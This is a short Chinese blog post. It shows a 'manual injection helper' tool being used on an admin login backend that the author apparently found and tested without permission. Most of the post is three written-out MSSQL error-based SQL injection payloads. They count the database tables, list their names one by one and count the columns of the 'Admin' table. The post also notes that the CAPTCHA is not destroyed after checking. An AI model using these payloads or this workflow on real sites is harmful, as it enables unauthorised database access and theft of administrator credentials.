手工注入帮助系统使用一例

前两天找到一款“手工注入帮助系统”的工具,批量http请求工作非常不错,例如爆破shell,检测是否支持aspx等等,不过他到底还是一款注入工具,所以下面发一则使用实例。

正好昨天看到一后台,顺手检测了一下,POST注入,有验证码(不过没有在验证完毕销毁),如下图:

先检测一下有多少表:

’ and 1=convert(int,(select replace(str(count(*))+‘N’,’ ‘,’’) from sysobjects where xtype=‘U’))–

返回"15N",然后开始使用工具跑出这些表名,爆表名的语句:

’ and 1=convert(int,(select top 1 name from sysobjects where xtype=‘U’ and id not in(select top 0 id from sysobjects where xtype=‘U’)))–

配置工具,循环跑出15个表名:

为了自动保存结果,可以使用过滤功能,将需要的值前后字符串填入,截图如下:

检查一下"Admin"表名有多少字段:

’ and 1=convert(int,(select str(count(*))+‘N’ from syscolumns where id=(select id from sysobjects where xtype=‘U’ and name=‘Admin’)))–

返回"6N",用上面相同的方法检测出字段名:

没有评论: